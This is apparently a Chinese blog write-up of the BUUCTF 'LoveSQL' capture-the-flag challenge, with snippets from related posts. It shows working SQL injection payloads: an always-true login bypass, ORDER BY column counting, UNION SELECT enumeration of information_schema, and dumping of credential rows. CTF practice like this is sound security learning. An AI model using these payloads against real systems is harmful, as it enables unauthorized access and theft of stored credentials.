[极客大挑战 2019]LoveSQL

已于 2022-09-20 10:57:04 修改
阅读量1.5k 收藏
点赞数 1
分类专栏: buuctf 文章标签: 安全 sql
于 2022-01-08 18:21:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pakho_C/article/details/122383758
版权

SQL注入 联合查询 信息泄露 数据库解密 靶场
关键词由CSDN通过智能技术生成

web
第五题

[极客大挑战 2019]LoveSQL

打开靶场
在这里插入图片描述
查看源码有无帮助
在这里插入图片描述
发现check.php访问
在这里插入图片描述
这就是检查输入的源码,没有什么作用

直接尝试永真式进行登录

1' or 1=1 #

在这里插入图片描述
在这里插入图片描述
登陆成功并得到一串密文,进行解密尝试
在这里插入图片描述
尝试了很多解密都无法解出

更换方法尝试,既然存在注入,直接猜解字段数

1' order by 4 #

在这里插入图片描述
在这里插入图片描述

改成3
在这里插入图片描述
在这里插入图片描述
没有报错,说明有字段数为3

使用联合查询猜解回显点

1' union select 1,2,3 #

在这里插入图片描述
在这里插入图片描述
得到回显点为 2和3

查询数据库中的表名

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #

在这里插入图片描述
得到数据库中一共有2个表geekuser和l0ve1ysq1

根据上面登陆成功的页面,用户为admin,猜测登陆页面的查询来自geekuser表,猜测flag在l0ve1ysq1表中

对l0ve1ysq1表进行查询,查询列名

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #

在这里插入图片描述
emm…
l0ve1ysq1的字段为id,username,password。。可能猜错了
先查一下试试

1' union select 1,username,password from l0ve1ysq1 where id=1 #

在这里插入图片描述
继续查询id=2
在这里插入图片描述
id=3
在这里插入图片描述
4
在这里插入图片描述
5
在这里插入图片描述
6
在这里插入图片描述
7
在这里插入图片描述
8
在这里插入图片描述
9
在这里插入图片描述

终于。当我试到了第16个。。。。得到了flag
在这里插入图片描述

pakho_C
关注
专栏目录
BUUCTF系列 // [极客挑战 2019] LoveSQL
qq_45805420的博客
10-03 551
前言 本题知识点:SQL注入 WP (这题居然是个连续剧。。。 ) 首先尝试使用上一题的解法绕过看看(上一题 WP 的 传送门),结果如下: 注意到密码有些奇怪,尝试着用 MD5 解码失败,也没啥思路(最后事实证明确实也用不到这玩意),故回到 SQL 注入上面来寻找突破 1、查询字段数 ...?username=admin'order by 列数#&password=123 // #号需要手动进行 URL 编码即替换成 %23 可知共有3个字段 2、测试注入点 接着使用联合查询寻找注入点即回显
【学习笔记 25】 buu [极客挑战 2019]LoveSQL
weixin_43553654的博客
07-27 323
0x00 知识点 1.利用常用万能密码登录 2.利用union构造联合注入得到flag 0x01 解题思路 1.打开网站,映入眼帘的就是一个登录界面,并且网页头上有一行小字,说是不让用sqlmap跑,那我偏要试试,但是现在还找不到注入点,继续进行,等下再试。这时在查看源码时发现验证的check.php页面和get的传参方式,直接访问check.php网页什么重要信息都没,那继续回到原网页利用常用的万能密码进行登录测试。 这里用到的是 用户名:admin'/* 密 码:*/' 登录成功。 发现被蓝色圈圈出
web-[极客挑战 2019]LoveSQL
wojiushilsy的博客
05-09 376
题目要点题目内容解题 题目要点 information表 group_concat() 联合查询 题目内容 解题 万能密码尝试登录 admin’ or 1=1; 爆破字段数 admin ' order by 1 # 输入框的时候用#,在地址栏的时候使用%23 在进行到4的时候报错,说明字段数为4 用union查询测试注入点(回显点位) /check.php?username=1' union select 1,2,3%23&password=1,得到回显点位为2和3. .
[极客挑战 2019]PHP
m0_62092622的博客
03-13 547
​ 建议先看一下这篇文章,了解一下序列化与反序列化,然后再写题 https://www.jb51.net/article/188446.htm https://www.jb51.net/article/188446.htm 打开是一个小猫 [点击并拖拽以移动] 看到提示是备份网站,拿扫描工具(我用的是Kali的dirsearch)找一找,发现一个www.zip文件(其实我发现了很多文件,看wp都是www.zip但我不明白那么多为什么就看这个) 查看文件 [点击并拖拽以移动] 自动下载了压缩包
[极客挑战 2019]BabySQL
weixin_41571993的博客
10-04 745
靶场练习
[极客挑战 2019]Http
qq_53689523的博客
02-19 329
其又提示,我们要使用Syclover浏览器,所以我们需要修改User-Agent(其记录是使用哪个浏览器访问)发现一个三叶草安全技术小组的招新群,加了下,发现慢了,哈哈哈,本来想着进下,算了,继续做题。所以我们brup抓包,添加referer字段,其作用是记录当前http包是从哪里发来的。6.添加X-Forwarded-For字段(显示访问该界面的用户的ip地址)它又提示你说只能使用本地链接才可以,所以又要伪造ip了。因为题目是http,所以大概是和http字段有关。5.修改User-Agent字段。
BUUCTF__[极客挑战 2019]LoveSQL_题解
风过江南乱的博客
06-19 1200
前言 很好,考完了死亡高数和大物,虽然还没考完,不过艰难的已经过去了,感觉神清气爽,水一题。 u1s1,线上考试=在海里考试。 读题 嗯,还是熟悉的背景图,好几题都是这个师傅出的sql注入。 首先很容易试出为单引号字符型闭合,输入 1、1"、1’ , 在1’时报错 然后尝试注入,发现,好像没有过滤,连 union 联合注入都能使用,并且很容易得到数据库名称,得到数据库名称geek 但在此之前,先得到列数为3,不是3则提示报错 然后,基本操作得到表信息,有两个表geekuser和l0ve1ysq
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...
[极客挑战 2019]LoveSQL 1
09-14
[极客挑战 2019]LoveSQL 1是一道题目或者比赛中的一个挑战。根据引用中提供的链接,我们可以看到相关的查询语句,并且通过注入点进行了SQL注入攻击。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在...
[极客挑战 2019]Http1解题思路
Megumiwind的博客
08-08 4265
1.打开Burp suite输入靶机的网址进行抓包,并把抓到的包发送到repeater(重发器)当中 在重发器中先点击发送查看一下结果的网页源代码。 在源码当中发现在一个html语句,并且是a标签的跳转语句,而跳转的地点是secret.php <a style="border:none;cursor:default;" onclick="return false" href="Secret.php">氛围</a> 2.既然是秘密页面,我们当然要进去看一下到底是.
BUUCTF DASBOOK Writrup
最新发布
weixin_50372036的博客
06-27 733
首先进入网页。
Header:请求头参数详解
panying1的博客
12-08 2737
Header 解释 示例 Accept 指定客户端能够接收的内容类型 Accept: text/plain, text/html,application/json Accept-Charset 浏览器可以接受的字符编码集。 Accept-Charset: iso-8859-5 Accept-Encoding 指定浏览器可以支持的web服务器返回内
CTF学习笔记——[极客挑战 2019]Http
Obs_cure的博客
01-10 402
一、[极客挑战 2019]Http 1.题目 2.解题步骤 查看源码的时候发现这里有链接 然后访问发现 猜测需要用burp抓包更改请求头再访问 更改之后提示syclover浏览器访问,于是继续更改 啊 这…他说我只能在本地读取… 这里没遇见过…百度了一下发现可以用XFF头进行伪造,于是继续构造 放包后得到flag 3.总结 主要考察了burp和伪造http协议,以及了解了XFF请求头绕过ip的方法。 4.参考资料 伪造XFF头绕过服务器IP过滤 - dubhe= -博客园 ...
BUUCTF web入门题目每日两道(一)
horiozn1709的博客
02-03 1233
[极客挑战 2019]EasySQL 1 该题目需要同时输入用户名和密码,在用户名处输入万能密码‘or 1=1 # ,密码处输入任意字符即可得到flag [HCTF 2018]WarmUp 1 php 代码审计问题 首先看页面源码 注意到在body中注释掉了 source.php ,所以我们直接访问source.php 得到源码: <?php highlight_file(__FILE__); classemmm { pu...
BUUCTF [极客挑战 2019]BabySQL
CrotZZ的博客
07-07 389
先来个基本操作 可以看到or是被过滤了 再试试字段数的判断 从返回看or 确实是被过滤了,试了下大小写绕过没有成功 用||代替or尝试,结果是成功的。(and可以用&&绕过) 可order by怎么办,那就先跳过直接看看能不能试出数据库名 1’ union select 1,database()# 可以看到union select,联合查询被过滤,这里可用双写绕过 一些简单过滤使用replace()将函数置换为空,只对单个有效,双写后就能绕过 1’ uniunionon sel
BUUCTF的web方向的题目(三)
wanan的博客
10-06 1538
BUUCTF的web方向的题目(三)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值